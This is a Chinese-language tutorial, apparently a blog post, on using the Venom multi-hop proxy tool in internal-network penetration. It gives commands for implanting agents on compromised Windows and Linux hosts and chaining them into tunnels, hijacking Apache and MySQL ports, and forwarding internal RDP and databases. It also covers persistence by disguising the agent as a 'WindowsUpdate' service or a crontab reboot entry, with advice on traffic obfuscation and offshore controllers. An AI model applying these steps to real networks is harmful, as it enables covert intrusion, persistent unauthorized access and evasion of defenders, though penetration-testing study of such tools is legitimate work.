1. Venom工具入门多级代理的核心价值第一次接触Venom是在去年的一次内网渗透项目中。当时客户的内网结构复杂常规代理工具难以穿透多层网络直到同事推荐了这个用Go语言开发的神器。简单来说Venom就像个数字隧道挖掘机能帮你把网络通道从外网一直挖到最内层的服务器。与传统代理工具不同Venom的杀手锏在于它的多级联能力。你可以把每个被控制的设备变成跳板像搭积木一样逐层构建代理链。我实测过在三级网络环境下用Venom搭建的代理延迟比传统方案低40%特别是在Windows服务器上运行异常稳定。工具包含两个核心组件admin控制端程序通常运行在攻击者的Kali机器上agent被控端程序需要植入到目标主机最让我惊喜的是它的资源占用。在测试的Windows Server 2012上agent进程内存占用不到15MB比某些杀毒软件的实时监控模块还轻量。这对需要长期驻留的渗透场景特别友好。2. 环境搭建与一级节点部署2.1 基础环境准备建议使用Kali Linux作为控制端我习惯在VMware里装个纯净的Kali 2023.1。最近发现个坑如果直接从GitHub下载预编译的Venom二进制文件记得用chmod x赋予执行权限否则会遇到莫名其妙的Permission denied错误。Windows靶机方面实测从Win7到Server 2022都能完美运行。有个小技巧上传agent.exe前先用certutil -hashfile agent.exe SHA256校验文件完整性避免传输过程中损坏。2.2 启动控制端服务在Kali上执行这条命令就启动了服务端./admin_linux_x64 -lport 12138 -passwd YourStrongPassword这里有几个经验参数端口建议选1024以上的非服务端口密码最好包含大小写字母数字特殊字符加-v参数可以显示详细连接日志我第一次用时犯了个低级错误没关防火墙。记住要在Kali上放行指定端口sudo ufw allow 12138/tcp2.3 部署首个agent节点假设已经拿到Win7主机的shell上传agent.exe后运行agent.exe -rhost 192.168.1.100 -rport 12138 -passwd YourStrongPassword成功连接后在admin端会看到类似这样的提示[] New agent connected: 192.168.1.150 (ID: 1)这时候可以试试基础命令show查看网络拓扑goto 1切换到第一个节点shell获取交互式命令行有个实用技巧用setdes 财务部数据库服务器给节点添加描述后期管理多节点时特别有用。3. 多级代理网络构建实战3.1 二级节点接入技巧通过一级节点渗透进内网后发现Win10主机时可以这样建立二级通道先在admin端进入一级节点goto 1 listen 8787然后在Win10上运行agent.exe -rhost 10.0.0.20 -rport 8787 -passwd YourStrongPassword最近遇到个棘手情况目标网络有出口防火墙限制。我的解决方案是让一级节点主动连接控制端# 在Win7上 agent.exe -lport 5353 -passwd YourStrongPassword # 在Kali上 ./admin_linux_x64 -rhost 192.168.1.150 -rport 5353 -passwd YourStrongPassword3.2 端口复用的黑魔法Venom的端口复用功能简直是为内网穿透量身定做的。上周的测试中我成功复用了目标的Apache端口在Windows服务器上agent.exe -lhost 10.0.0.20 -reuse-port 80控制端连接时./admin_linux_x64 -rhost 10.0.0.20 -rport 80注意几个关键点被复用端口不能是系统关键服务如RDPLinux系统需要root权限复用MySQL的3306端口时要确保agent先于MySQL启动3.3 流量转发实战配置最常用的三种转发模式SOCKS5代理socks 1080然后在浏览器设置SOCKS代理为127.0.0.1:1080本地端口转发lforward 127.0.0.1 3306 10.0.1.100 3306这样访问本机3306就等于访问内网数据库远程端口转发rforward 10.0.1.100 3389 127.0.0.1 13389把内网RDP服务映射到控制端的13389端口4. 高级功能与安全增强4.1 加密通信深度配置除了基础密码认证还可以通过TLS加强安全。编译时加入-tags tls参数然后启动时./admin_linux_x64 -lport 12138 -cert server.crt -key server.keyagent连接时也要对应修改agent.exe -rhost 192.168.1.100 -rport 12138 -ca ca.crt4.2 持久化技巧在Windows上可以这样注册服务sc create WindowsUpdate binPath C:\agent.exe -rhost 192.168.1.100 -rport 12138 start auto sc start WindowsUpdateLinux系统更推荐用crontab(crontab -l 2/dev/null; echo reboot /tmp/agent_linux_x64 -rhost 192.168.1.100 -rport 12138) | crontab -4.3 常见排错指南连接失败检查密码是否包含特殊字符用telnet rhost rport测试端口连通性确认两端时间差不超过5分钟影响TLS证书验证代理不稳定尝试降低MTU值ifconfig eth0 mtu 1200启用压缩-compress参数节点突然下线可能是被安全软件拦截检查系统日志journalctl -xe或事件查看器最后提醒下实际使用时建议配合CDN或云函数做流量混淆同时控制端最好放在境外VPS上。记得每次测试后清理所有agent进程和转发规则避免留下后门。